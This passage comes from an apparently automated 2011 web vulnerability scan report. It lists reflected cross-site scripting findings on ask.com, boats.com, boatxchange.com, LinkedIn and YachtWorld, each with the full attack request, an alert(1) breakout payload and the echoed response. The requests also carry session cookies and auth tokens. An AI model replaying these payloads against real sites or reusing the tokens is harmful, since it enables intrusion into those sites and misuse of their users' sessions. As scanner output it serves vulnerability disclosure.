The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0073'%3balert(1)//d6de0c6a20 was submitted in the qid parameter. This input was echoed as f0073';alert(1)//d6de0c6a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=regulator+boat&qsrc=0&frstpgo=0&o=0&l=dir&qid=98661B091CD7946B37C24EBBC344D14Af0073'%3balert(1)//d6de0c6a20&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:59 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:59 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 123872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - Wha
...[SNIP]...
<script type="text/javascript">
var _psBack = '&#171;&#160;Prev';
var _psForward = 'Next&#160;&#187;';
var _psQueryID = '98661B091CD7946B37C24EBBC344D14Af0073';alert(1)//d6de0c6a20';
var _psQuerySource = '0';
var _psSiteID = '';
</script>
...[SNIP]...

3.79. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boats.com
Path:   /boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e0f7"><script>alert(1)</script>73e292f6ad1 was submitted in the yw_country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US6e0f7"><script>alert(1)</script>73e292f6ad1 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761473052; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=bcKRwwsrrCjc; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=693|Accelerated|109|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123D92E17E5C;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<a href="http://www.boats.com/boat-transport/index.jsp?source=yachtworld&yw_country=us6e0f7"><script>alert(1)</script>73e292f6ad1">
...[SNIP]...

3.80. http://www.boats.com/boat-transport/index.jsp [yw_country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boats.com
Path:   /boat-transport/index.jsp

Issue detail

The value of the yw_country request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d06'%3balert(1)//ec734b2bd35 was submitted in the yw_country parameter. This input was echoed as 33d06';alert(1)//ec734b2bd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boat-transport/index.jsp?source=yachtworld&yw_country=US33d06'%3balert(1)//ec734b2bd35 HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:49:21 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1296157761823561; path=/; expires=Sat, 29-Jan-11 19:49:21 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_temp_info=lf:ywlf; domain=.boats.com; path=/
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:21 GMT
Set-Cookie: JSESSIONID=abnezuav6TX4; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=599|Accelerated|669|1|0;Expires=Sat, 26-Jan-13 19:49:21 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B10123DC2FB55B2;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sat, 29-Jan-11 07:49:21 GMT;Path=/;Domain=.boats.com
X-SL-CompState: Recompiling


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><script>var __$1a49={BaseUrl:(("https:"==document.location.protocol)?"https:":"http:")+"//analytics.strangeloopnetworks.com/",Gi
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/us33d06';alert(1)//ec734b2bd35/transport.html';
OAS_listpos = 'Right1,Top1';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String
...[SNIP]...

3.81. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff2dc<script>alert(1)</script>051e6b7c2ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=0738E8BB69B4576E7DFEB8F02B3A22A5.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Makeff2dc<script>alert(1)</script>051e6b7c2ed/Regulator/search.html
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearc
...[SNIP]...

3.82. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 631f9<script>alert(1)</script>38d066a2dec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=70B1F81A76B600538F4CCDD338B20EB4.tomcat1; Path=/pboats
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator631f9<script>alert(1)</script>38d066a2dec/search.html
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandCo
...[SNIP]...

3.83. http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boatxchange.com
Path:   /pboats/browse/Make/Regulator/search.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ef1d6<script>alert(1)</script>dbd5bb8b76 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pboats/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76 HTTP/1.1
Host: www.boatxchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:43:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8n PHP/5.2.3 mod_jk/1.2.30
Set-Cookie: JSESSIONID=EE13D5B4D07CE6426B8A05BBA4EAD214.tomcat1; Path=/pboats
Content-Language: en
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 18869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="iso-8859-1"?><html xmlns="http://www.w3.org/199
...[SNIP]...
<pre>
errorMessage: null
Exception: java.lang.RuntimeException: Problem parsing path info:/browse/Make/Regulator/ef1d6<script>alert(1)</script>dbd5bb8b76
   at com.primo.gnav.mvc.GnavBrowseCommandController.createFilteredCommand(GnavBrowseCommandController.java:189)
   at com.primo.gnav.mvc.GnavSearchCommandController.handle(GnavSearchCommandController.jav
...[SNIP]...

3.84. https://www.linkedin.com/secure/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47a6'-alert(1)-'f2583992d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /secureb47a6'-alert(1)-'f2583992d5c/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a42198c; bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; JSESSIONID="ajax:2350077440714366421"; leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296155990:5ed64d4d5f57e19d1092d1eaf1f4a8bd26dd7b76"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:Z8AO-20Khh1K0OWjw5zaBBzxLBaEbMVjxTAWV7kKsG1Zr1YspMYdVT:1296157810:2b1512b33861e588d824862ae46734c91e6073f9"; Version=1; Max-Age=1799; Expires=Thu, 27-Jan-2011 20:20:09 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 990
Date: Thu, 27 Jan 2011 19:50:10 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:20:19 GMT;path=/;httponly

<!DOCTYPE html>
<html>
<head title="Redirecting...">
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="pagekey" content="external_redirect" />
<style type="
...[SNIP]...
<script type="text/javascript">window.location.replace('http://www.linkedin.com/secureb47a6'-alert(1)-'f2583992d5c/login');</script>
...[SNIP]...

3.85. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 30b6e><script>alert(1)</script>9e5aaf9f068 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; 
savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid
%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:51 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater30b6e><scr
...[SNIP]...
<a href=/core/listing/video_gallery.jsp?boat_id=1558604&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&&ywo=bluewater&&ybw= onClick="return popup(this, 'notes')">
...[SNIP]...

3.86. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 5ada6--><script>alert(1)</script>b8852678aaf was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater5ada6--><script>alert(1)</script>b8852678aaf&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
